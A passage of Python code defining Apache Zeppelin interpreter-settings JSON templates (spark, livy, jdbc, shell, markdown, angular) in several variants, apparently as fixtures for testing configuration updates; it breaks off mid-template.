template = '\n{\n "interpreterSettings": {\n "2CKEKWY8Z": {\n "id": "2CKEKWY8Z",\n "name": "angular",\n "group": "angular",\n "properties": {},\n "status": "READY",\n "interpreterGroup": [\n {\n "name": "angular",\n "class": "org.apache.zeppelin.angular.AngularInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "editOnDblClick": true\n }\n }\n ],\n "dependencies": [],\n "option": {\n "remote": true,\n "port": -1,\n "perNote": "shared",\n "perUser": "shared",\n "isExistingProcess": false,\n "setPermission": false,\n "users": [],\n "isUserImpersonate": false\n }\n },\n "2CKX8WPU1": {\n "id": "2CKX8WPU1",\n "name": "spark",\n "group": "spark",\n "properties": {\n "spark.executor.memory": "512m",\n "args": "",\n "zeppelin.spark.printREPLOutput": "true",\n "spark.cores.max": "",\n "zeppelin.dep.additionalRemoteRepository": "spark-packages,http://dl.bintray.com/spark-packages/maven,false;",\n "zeppelin.spark.sql.stacktrace": "false",\n "zeppelin.spark.importImplicit": "true",\n "zeppelin.spark.concurrentSQL": "false",\n "zeppelin.spark.useHiveContext": "true",\n "zeppelin.pyspark.python": "python",\n "zeppelin.dep.localrepo": "local-repo",\n "zeppelin.R.knitr": "true",\n "zeppelin.spark.maxResult": "1000",\n "master": "yarn-client",\n "spark.app.name": "Zeppelin",\n "zeppelin.R.image.width": "100%",\n "zeppelin.R.render.options": "out.format \\u003d \\u0027html\\u0027, comment \\u003d NA, echo \\u003d FALSE, results \\u003d \\u0027asis\\u0027, message \\u003d F, warning \\u003d F",\n "zeppelin.R.cmd": "R"\n },\n "status": "READY",\n "interpreterGroup": [\n {\n "name": "spark",\n "class": "org.apache.zeppelin.spark.SparkInterpreter",\n "defaultInterpreter": true,\n "editor": {\n "language": "scala"\n }\n },\n {\n "name": "sql",\n "class": "org.apache.zeppelin.spark.SparkSqlInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "sql"\n }\n },\n {\n "name": "dep",\n "class": "org.apache.zeppelin.spark.DepInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "scala"\n }\n },\n {\n "name": "pyspark",\n "class": "org.apache.zeppelin.spark.PySparkInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "python"\n }\n },\n {\n "name": "r",\n "class": "org.apache.zeppelin.spark.SparkRInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "r"\n }\n }\n ],\n "dependencies": [],\n "option": {\n "remote": true,\n "port": -1,\n "perNote": "shared",\n "perUser": "shared",\n "isExistingProcess": false,\n "setPermission": false,\n "users": [],\n "isUserImpersonate": false\n }\n },\n "2CK8A9MEG": {\n "id": "2CK8A9MEG",\n "name": "jdbc",\n "group": "jdbc",\n "properties": {\n "default.password": "",\n "zeppelin.jdbc.auth.type": "",\n "common.max_count": "1000",\n "zeppelin.jdbc.principal": "",\n "default.user": "gpadmin",\n "default.url": "jdbc:postgresql://localhost:5432/",\n "default.driver": "org.postgresql.Driver",\n "zeppelin.jdbc.keytab.location": "",\n "zeppelin.jdbc.concurrent.use": "true",\n "zeppelin.jdbc.concurrent.max_connection": "10"\n },\n "status": "READY",\n "interpreterGroup": [\n {\n "name": "sql",\n "class": "org.apache.zeppelin.jdbc.JDBCInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "sql",\n "editOnDblClick": false\n }\n }\n ],\n "dependencies": [],\n "option": {\n "remote": true,\n "port": -1,\n "perNote": "shared",\n "perUser": "shared",\n "isExistingProcess": false,\n "setPermission": false,\n "users": [],\n "isUserImpersonate": false\n }\n },\n "2CKX6DGQZ": {\n "id": "2CKX6DGQZ",\n 
"name": "livy",\n "group": "livy",\n "properties": {\n "zeppelin.livy.pull_status.interval.millis": "1000",\n "livy.spark.executor.memory": "",\n "zeppelin.livy.session.create_timeout": "120",\n "zeppelin.livy.principal": "",\n "zeppelin.livy.spark.sql.maxResult": "1000",\n "zeppelin.livy.keytab": "",\n "zeppelin.livy.concurrentSQL": "false",\n "zeppelin.livy.spark.sql.field.truncate": "true",\n "livy.spark.executor.cores": "",\n "zeppelin.livy.displayAppInfo": "false",\n "zeppelin.livy.url": "http://localhost:8998",\n "livy.spark.dynamicAllocation.minExecutors": "",\n "livy.spark.driver.cores": "",\n "livy.spark.jars.packages": "",\n "livy.spark.dynamicAllocation.enabled": "",\n "livy.spark.executor.instances": "",\n "livy.spark.dynamicAllocation.cachedExecutorIdleTimeout": "",\n "livy.spark.dynamicAllocation.maxExecutors": "",\n "livy.spark.dynamicAllocation.initialExecutors": "",\n "livy.spark.driver.memory": ""\n },\n "status": "READY",\n "interpreterGroup": [\n {\n "name": "spark",\n "class": "org.apache.zeppelin.livy.LivySparkInterpreter",\n "defaultInterpreter": true,\n "editor": {\n "language": "scala",\n "editOnDblClick": false\n }\n },\n {\n "name": "sql",\n "class": "org.apache.zeppelin.livy.LivySparkSQLInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "sql",\n "editOnDblClick": false\n }\n },\n {\n "name": "pyspark",\n "class": "org.apache.zeppelin.livy.LivyPySparkInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "python",\n "editOnDblClick": false\n }\n },\n {\n "name": "pyspark3",\n "class": "org.apache.zeppelin.livy.LivyPySpark3Interpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "python",\n "editOnDblClick": false\n }\n },\n {\n "name": "sparkr",\n "class": "org.apache.zeppelin.livy.LivySparkRInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "r",\n "editOnDblClick": false\n }\n }\n ],\n "dependencies": [],\n "option": {\n "remote": true,\n "port": -1,\n "perNote": "shared",\n "perUser": "scoped",\n "isExistingProcess": false,\n "setPermission": false,\n "users": [],\n "isUserImpersonate": false\n }\n },\n "2CKAY1A8Y": {\n "id": "2CKAY1A8Y",\n "name": "md",\n "group": "md",\n "properties": {\n "markdown.parser.type": "markdown4j"\n },\n "status": "READY",\n "interpreterGroup": [\n {\n "name": "md",\n "class": "org.apache.zeppelin.markdown.Markdown",\n "defaultInterpreter": false,\n "editor": {\n "language": "markdown",\n "editOnDblClick": true\n }\n }\n ],\n "dependencies": [],\n "option": {\n "remote": true,\n "port": -1,\n "perNote": "shared",\n "perUser": "shared",\n "isExistingProcess": false,\n "setPermission": false,\n "users": [],\n "isUserImpersonate": false\n }\n },\n "2CHS8UYQQ": {\n "id": "2CHS8UYQQ",\n "name": "sh",\n "group": "sh",\n "properties": {\n "zeppelin.shell.keytab.location": "",\n "shell.command.timeout.millisecs": "60000",\n "zeppelin.shell.principal": "",\n "zeppelin.shell.auth.type": ""\n },\n "status": "READY",\n "interpreterGroup": [\n {\n "name": "sh",\n "class": "org.apache.zeppelin.shell.ShellInterpreter",\n "defaultInterpreter": false,\n "editor": {\n "language": "sh",\n "editOnDblClick": false\n }\n }\n ],\n "dependencies": [],\n "option": {\n "remote": true,\n "port": -1,\n "perNote": "shared",\n "perUser": "shared",\n "isExistingProcess": false,\n "setPermission": false,\n "users": [],\n "isUserImpersonate": false\n }\n }\n },\n "interpreterBindings": {},\n "interpreterRepositories": [\n {\n "id": "central",\n "type": "default",\n "url": 
"http://repo1.maven.org/maven2/",\n "releasePolicy": {\n "enabled": true,\n "updatePolicy": "daily",\n "checksumPolicy": "warn"\n },\n "snapshotPolicy": {\n "enabled": true,\n "updatePolicy": "daily",\n "checksumPolicy": "warn"\n },\n "mirroredRepositories": [],\n "repositoryManager": false\n },\n {\n "id": "local",\n "type": "default",\n "url": "file:///home/zeppelin/.m2/repository",\n "releasePolicy": {\n "enabled": true,\n "updatePolicy": "daily",\n "checksumPolicy": "warn"\n },\n "snapshotPolicy": {\n "enabled": true,\n "updatePolicy": "daily",\n "checksumPolicy": "warn"\n },\n "mirroredRepositories": [],\n "repositoryManager": false\n }\n ]\n}\n'
template_after_base = '{\n "interpreterSettings": {\n "2CHS8UYQQ": {\n "status": "READY", \n "group": "sh", \n "name": "sh", \n "id": "2CHS8UYQQ", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "sh"\n }, \n "defaultInterpreter": false, \n "name": "sh", \n "class": "org.apache.zeppelin.shell.ShellInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "shell.command.timeout.millisecs": "60000", \n "zeppelin.shell.auth.type": "", \n "zeppelin.shell.keytab.location": "", \n "zeppelin.shell.principal": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKAY1A8Y": {\n "status": "READY", \n "group": "md", \n "name": "md", \n "id": "2CKAY1A8Y", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": true, \n "language": "markdown"\n }, \n "defaultInterpreter": false, \n "name": "md", \n "class": "org.apache.zeppelin.markdown.Markdown"\n }\n ], \n "dependencies": [], \n "properties": {\n "markdown.parser.type": "markdown4j"\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKX8WPU1": {\n "status": "READY", \n "group": "spark", \n "name": "spark", \n "id": "2CKX8WPU1", \n "interpreterGroup": [\n {\n "editor": {\n "language": "scala"\n }, \n "defaultInterpreter": true, \n "name": "spark", \n "class": "org.apache.zeppelin.spark.SparkInterpreter"\n }, \n {\n "editor": {\n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.spark.SparkSqlInterpreter"\n }, \n {\n "editor": {\n "language": "scala"\n }, \n "defaultInterpreter": false, \n "name": "dep", \n "class": "org.apache.zeppelin.spark.DepInterpreter"\n }, \n {\n "editor": {\n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark", \n "class": "org.apache.zeppelin.spark.PySparkInterpreter"\n }, \n {\n "editor": {\n "language": "r"\n }, \n "defaultInterpreter": false, \n "name": "r", \n "class": "org.apache.zeppelin.spark.SparkRInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "zeppelin.dep.additionalRemoteRepository": "spark-packages,http://dl.bintray.com/spark-packages/maven,false;", \n "zeppelin.dep.localrepo": "local-repo", \n "zeppelin.spark.useHiveContext": "true", \n "zeppelin.spark.printREPLOutput": "true", \n "zeppelin.R.image.width": "100%", \n "zeppelin.spark.importImplicit": "true", \n "spark.app.name": "Zeppelin", \n "args": "", \n "zeppelin.spark.sql.stacktrace": "false", \n "zeppelin.spark.concurrentSQL": "false", \n "zeppelin.R.cmd": "R", \n "master": "yarn-client", \n "zeppelin.pyspark.python": "python", \n "zeppelin.R.knitr": "true", \n "zeppelin.R.render.options": "out.format = \'html\', comment = NA, echo = FALSE, results = \'asis\', message = F, warning = F", \n "spark.executor.memory": "512m", \n "zeppelin.spark.maxResult": "1000", \n "spark.cores.max": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CK8A9MEG": {\n "status": "READY", \n "group": "jdbc", \n "name": "jdbc", \n "id": "2CK8A9MEG", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": 
"sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.jdbc.JDBCInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "common.max_count": "1000", \n "zeppelin.jdbc.keytab.location": "", \n "zeppelin.jdbc.concurrent.max_connection": "10", \n "default.user": "gpadmin", \n "zeppelin.jdbc.auth.type": "", \n "default.url": "jdbc:postgresql://localhost:5432/", \n "default.driver": "org.postgresql.Driver", \n "zeppelin.jdbc.concurrent.use": "true", \n "default.password": "", \n "zeppelin.jdbc.principal": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2C4U48MY3_spark2": {\n "status": "READY", \n "group": "spark", \n "name": "spark2", \n "id": "2C4U48MY3_spark2", \n "interpreterGroup": [\n {\n "defaultInterpreter": true, \n "name": "spark", \n "class": "org.apache.zeppelin.spark.SparkInterpreter"\n }, \n {\n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.spark.SparkSqlInterpreter"\n }, \n {\n "defaultInterpreter": false, \n "name": "dep", \n "class": "org.apache.zeppelin.spark.DepInterpreter"\n }, \n {\n "defaultInterpreter": false, \n "name": "pyspark", \n "class": "org.apache.zeppelin.spark.PySparkInterpreter"\n }, \n {\n "defaultInterpreter": false, \n "name": "r", \n "class": "org.apache.zeppelin.spark.SparkRInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "zeppelin.dep.additionalRemoteRepository": "spark-packages,http://dl.bintray.com/spark-packages/maven,false;", \n "zeppelin.dep.localrepo": "local-repo", \n "zeppelin.spark.useHiveContext": "true", \n "zeppelin.spark.printREPLOutput": "true", \n "zeppelin.R.image.width": "100%", \n "zeppelin.spark.importImplicit": "true", \n "spark.app.name": "Zeppelin", \n "args": "", \n "zeppelin.spark.sql.stacktrace": "false", \n "zeppelin.spark.concurrentSQL": "false", \n "zeppelin.R.cmd": "R", \n "master": "local[*]", \n "zeppelin.pyspark.python": "python", \n "zeppelin.R.knitr": "true", \n "zeppelin.R.render.options": "out.format = \'html\', comment = NA, echo = FALSE, results = \'asis\', message = F, warning = F", \n "spark.executor.memory": "", \n "zeppelin.spark.maxResult": "1000", \n "spark.cores.max": ""\n }, \n "option": {\n "setPermission": false, \n "perNoteProcess": false, \n "remote": true, \n "perNoteSession": false, \n "isExistingProcess": false, \n "port": -1\n }\n }, \n "2CKEKWY8Z": {\n "status": "READY", \n "group": "angular", \n "name": "angular", \n "id": "2CKEKWY8Z", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": true\n }, \n "defaultInterpreter": false, \n "name": "angular", \n "class": "org.apache.zeppelin.angular.AngularInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {}, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2C8A4SZ9T_livy2": {\n "status": "READY", \n "group": "livy", \n "name": "livy2", \n "id": "2C8A4SZ9T_livy2", \n "interpreterGroup": [\n {\n "defaultInterpreter": false, \n "class": "org.apache.zeppelin.livy.LivySparkInterpreter", \n "name": "spark", \n "editor": {\n "editOnDblClick": false, \n "language": "scala"\n }\n }, \n {\n "defaultInterpreter": false, \n "class": "org.apache.zeppelin.livy.LivySparkSQLInterpreter", \n "name": "sql", \n "editor": {\n 
"editOnDblClick": false, \n "language": "sql"\n }\n }, \n {\n "defaultInterpreter": false, \n "class": "org.apache.zeppelin.livy.LivyPySparkInterpreter", \n "name": "pyspark", \n "editor": {\n "editOnDblClick": false, \n "language": "python"\n }\n }, \n {\n "defaultInterpreter": false, \n "class": "org.apache.zeppelin.livy.LivyPySpark3Interpreter", \n "name": "pyspark3", \n "editor": {\n "editOnDblClick": false, \n "language": "python"\n }\n }, \n {\n "defaultInterpreter": false, \n "class": "org.apache.zeppelin.livy.LivySparkRInterpreter", \n "name": "sparkr", \n "editor": {\n "editOnDblClick": false, \n "language": "r"\n }\n }, \n {\n "defaultInterpreter": false, \n "name": "shared", \n "class": "org.apache.zeppelin.livy.LivySharedInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "zeppelin.livy.keytab": "", \n "zeppelin.livy.spark.sql.maxResult": "1000", \n "livy.spark.executor.instances": "", \n "livy.spark.executor.memory": "", \n "livy.spark.dynamicAllocation.enabled": "", \n "livy.spark.dynamicAllocation.cachedExecutorIdleTimeout": "", \n "livy.spark.dynamicAllocation.initialExecutors": "", \n "zeppelin.livy.principal": "", \n "zeppelin.livy.session.create_timeout": "120", \n "livy.spark.driver.memory": "", \n "livy.spark.jars.packages": "", \n "livy.spark.dynamicAllocation.maxExecutors": "", \n "zeppelin.livy.concurrentSQL": "false", \n "zeppelin.livy.displayAppInfo": "true", \n "livy.spark.dynamicAllocation.minExecutors": "", \n "zeppelin.livy.url": "http://localhost:8998", \n "zeppelin.livy.pull_status.interval.millis": "1000", \n "livy.spark.driver.cores": "", \n "livy.spark.executor.cores": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "scoped", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKX6DGQZ": {\n "status": "READY", \n "group": "livy", \n "name": "livy", \n "id": "2CKX6DGQZ", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "scala"\n }, \n "defaultInterpreter": true, \n "name": "spark", \n "class": "org.apache.zeppelin.livy.LivySparkInterpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.livy.LivySparkSQLInterpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark", \n "class": "org.apache.zeppelin.livy.LivyPySparkInterpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark3", \n "class": "org.apache.zeppelin.livy.LivyPySpark3Interpreter"\n }, \n {\n "editor": {\n "editOnDblClick": false, \n "language": "r"\n }, \n "defaultInterpreter": false, \n "name": "sparkr", \n "class": "org.apache.zeppelin.livy.LivySparkRInterpreter"\n }, \n {\n "defaultInterpreter": false, \n "name": "shared", \n "class": "org.apache.zeppelin.livy.LivySharedInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "livy.spark.dynamicAllocation.initialExecutors": "", \n "zeppelin.livy.keytab": "", \n "zeppelin.livy.spark.sql.maxResult": "1000", \n "livy.spark.executor.instances": "", \n "livy.spark.driver.memory": "", \n "livy.spark.executor.memory": "", \n "livy.spark.dynamicAllocation.enabled": "", \n "livy.spark.dynamicAllocation.cachedExecutorIdleTimeout": "", \n "livy.spark.driver.cores": "", \n "zeppelin.livy.session.create_timeout": 
"120", \n "zeppelin.livy.principal": "", \n "livy.spark.jars.packages": "", \n "livy.spark.dynamicAllocation.maxExecutors": "", \n "zeppelin.livy.concurrentSQL": "false", \n "zeppelin.livy.displayAppInfo": "false", \n "livy.spark.dynamicAllocation.minExecutors": "", \n "zeppelin.livy.url": "http://localhost:8998", \n "zeppelin.livy.spark.sql.field.truncate": "true", \n "zeppelin.livy.pull_status.interval.millis": "1000", \n "livy.spark.executor.cores": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "scoped", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }\n }, \n "interpreterBindings": {}, \n "interpreterRepositories": [\n {\n "releasePolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "mirroredRepositories": [], \n "snapshotPolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "url": "http://repo1.maven.org/maven2/", \n "repositoryManager": false, \n "type": "default", \n "id": "central"\n }, \n {\n "releasePolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "mirroredRepositories": [], \n "snapshotPolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "url": "file:///home/zeppelin/.m2/repository", \n "repositoryManager": false, \n "type": "default", \n "id": "local"\n }\n ]\n}'
template_after_without_spark_and_livy = '{\n "interpreterSettings": {\n "2CHS8UYQQ": {\n "status": "READY", \n "group": "sh", \n "name": "sh", \n "id": "2CHS8UYQQ", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "sh"\n }, \n "defaultInterpreter": false, \n "name": "sh", \n "class": "org.apache.zeppelin.shell.ShellInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "shell.command.timeout.millisecs": "60000", \n "zeppelin.shell.auth.type": "", \n "zeppelin.shell.keytab.location": "", \n "zeppelin.shell.principal": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKAY1A8Y": {\n "status": "READY", \n "group": "md", \n "name": "md", \n "id": "2CKAY1A8Y", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": true, \n "language": "markdown"\n }, \n "defaultInterpreter": false, \n "name": "md", \n "class": "org.apache.zeppelin.markdown.Markdown"\n }\n ], \n "dependencies": [], \n "properties": {\n "markdown.parser.type": "markdown4j"\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKX8WPU1": {\n "status": "READY", \n "group": "spark", \n "name": "spark", \n "id": "2CKX8WPU1", \n "interpreterGroup": [\n {\n "editor": {\n "language": "scala"\n }, \n "defaultInterpreter": true, \n "name": "spark", \n "class": "org.apache.zeppelin.spark.SparkInterpreter"\n }, \n {\n "editor": {\n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.spark.SparkSqlInterpreter"\n }, \n {\n "editor": {\n "language": "scala"\n }, \n "defaultInterpreter": false, \n "name": "dep", \n "class": "org.apache.zeppelin.spark.DepInterpreter"\n }, \n {\n "editor": {\n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark", \n "class": "org.apache.zeppelin.spark.PySparkInterpreter"\n }, \n {\n "editor": {\n "language": "r"\n }, \n "defaultInterpreter": false, \n "name": "r", \n "class": "org.apache.zeppelin.spark.SparkRInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "zeppelin.dep.additionalRemoteRepository": "spark-packages,http://dl.bintray.com/spark-packages/maven,false;", \n "zeppelin.dep.localrepo": "local-repo", \n "zeppelin.spark.useHiveContext": "true", \n "zeppelin.spark.printREPLOutput": "true", \n "zeppelin.R.image.width": "100%", \n "zeppelin.spark.importImplicit": "true", \n "spark.app.name": "Zeppelin", \n "args": "", \n "zeppelin.spark.sql.stacktrace": "false", \n "zeppelin.spark.concurrentSQL": "false", \n "SPARK_HOME": "/usr/hdp/current/spark-client/", \n "zeppelin.R.cmd": "R", \n "master": "yarn-client", \n "zeppelin.pyspark.python": "python", \n "zeppelin.R.knitr": "true", \n "zeppelin.R.render.options": "out.format = \'html\', comment = NA, echo = FALSE, results = \'asis\', message = F, warning = F", \n "spark.executor.memory": "512m", \n "zeppelin.spark.maxResult": "1000", \n "spark.cores.max": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CK8A9MEG": {\n "status": "READY", \n "group": "jdbc", \n "name": "jdbc", \n "id": "2CK8A9MEG", \n 
"interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.jdbc.JDBCInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "common.max_count": "1000", \n "zeppelin.jdbc.keytab.location": "", \n "zeppelin.jdbc.concurrent.max_connection": "10", \n "default.user": "gpadmin", \n "zeppelin.jdbc.auth.type": "", \n "default.url": "jdbc:postgresql://localhost:5432/", \n "default.driver": "org.postgresql.Driver", \n "zeppelin.jdbc.concurrent.use": "true", \n "default.password": "", \n "zeppelin.jdbc.principal": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKEKWY8Z": {\n "status": "READY", \n "group": "angular", \n "name": "angular", \n "id": "2CKEKWY8Z", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": true\n }, \n "defaultInterpreter": false, \n "name": "angular", \n "class": "org.apache.zeppelin.angular.AngularInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {}, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }\n }, \n "interpreterBindings": {}, \n "interpreterRepositories": [\n {\n "releasePolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "mirroredRepositories": [], \n "snapshotPolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "url": "http://repo1.maven.org/maven2/", \n "repositoryManager": false, \n "type": "default", \n "id": "central"\n }, \n {\n "releasePolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "mirroredRepositories": [], \n "snapshotPolicy": {\n "checksumPolicy": "warn", \n "enabled": true, \n "updatePolicy": "daily"\n }, \n "url": "file:///home/zeppelin/.m2/repository", \n "repositoryManager": false, \n "type": "default", \n "id": "local"\n }\n ]\n}'
template_after_kerberos = '{\n "interpreterSettings": {\n "2CHS8UYQQ": {\n "status": "READY", \n "group": "sh", \n "name": "sh", \n "id": "2CHS8UYQQ", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": false, \n "language": "sh"\n }, \n "defaultInterpreter": false, \n "name": "sh", \n "class": "org.apache.zeppelin.shell.ShellInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "shell.command.timeout.millisecs": "60000", \n "zeppelin.shell.auth.type": "", \n "zeppelin.shell.keytab.location": "", \n "zeppelin.shell.principal": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKAY1A8Y": {\n "status": "READY", \n "group": "md", \n "name": "md", \n "id": "2CKAY1A8Y", \n "interpreterGroup": [\n {\n "editor": {\n "editOnDblClick": true, \n "language": "markdown"\n }, \n "defaultInterpreter": false, \n "name": "md", \n "class": "org.apache.zeppelin.markdown.Markdown"\n }\n ], \n "dependencies": [], \n "properties": {\n "markdown.parser.type": "markdown4j"\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CKX8WPU1": {\n "status": "READY", \n "group": "spark", \n "name": "spark", \n "id": "2CKX8WPU1", \n "interpreterGroup": [\n {\n "editor": {\n "language": "scala"\n }, \n "defaultInterpreter": true, \n "name": "spark", \n "class": "org.apache.zeppelin.spark.SparkInterpreter"\n }, \n {\n "editor": {\n "language": "sql"\n }, \n "defaultInterpreter": false, \n "name": "sql", \n "class": "org.apache.zeppelin.spark.SparkSqlInterpreter"\n }, \n {\n "editor": {\n "language": "scala"\n }, \n "defaultInterpreter": false, \n "name": "dep", \n "class": "org.apache.zeppelin.spark.DepInterpreter"\n }, \n {\n "editor": {\n "language": "python"\n }, \n "defaultInterpreter": false, \n "name": "pyspark", \n "class": "org.apache.zeppelin.spark.PySparkInterpreter"\n }, \n {\n "editor": {\n "language": "r"\n }, \n "defaultInterpreter": false, \n "name": "r", \n "class": "org.apache.zeppelin.spark.SparkRInterpreter"\n }\n ], \n "dependencies": [], \n "properties": {\n "zeppelin.dep.additionalRemoteRepository": "spark-packages,http://dl.bintray.com/spark-packages/maven,false;", \n "zeppelin.dep.localrepo": "local-repo", \n "zeppelin.spark.useHiveContext": "true", \n "zeppelin.spark.printREPLOutput": "true", \n "spark.yarn.principal": "", \n "zeppelin.R.image.width": "100%", \n "zeppelin.spark.importImplicit": "true", \n "spark.app.name": "Zeppelin", \n "args": "", \n "zeppelin.spark.sql.stacktrace": "false", \n "zeppelin.spark.concurrentSQL": "false", \n "spark.yarn.keytab": "", \n "zeppelin.R.cmd": "R", \n "master": "yarn-client", \n "zeppelin.pyspark.python": "python", \n "zeppelin.R.knitr": "true", \n "zeppelin.R.render.options": "out.format = \'html\', comment = NA, echo = FALSE, results = \'asis\', message = F, warning = F", \n "spark.executor.memory": "512m", \n "zeppelin.spark.maxResult": "1000", \n "spark.cores.max": ""\n }, \n "option": {\n "setPermission": false, \n "remote": true, \n "users": [], \n "isExistingProcess": false, \n "perUser": "shared", \n "isUserImpersonate": false, \n "perNote": "shared", \n "port": -1\n }\n }, \n "2CK8A9MEG": {\n "status": "READY", \n "group": "jdbc", \n "name": "jdbc", \n "id": "2CK8A9MEG", \n "interpreterGroup": 
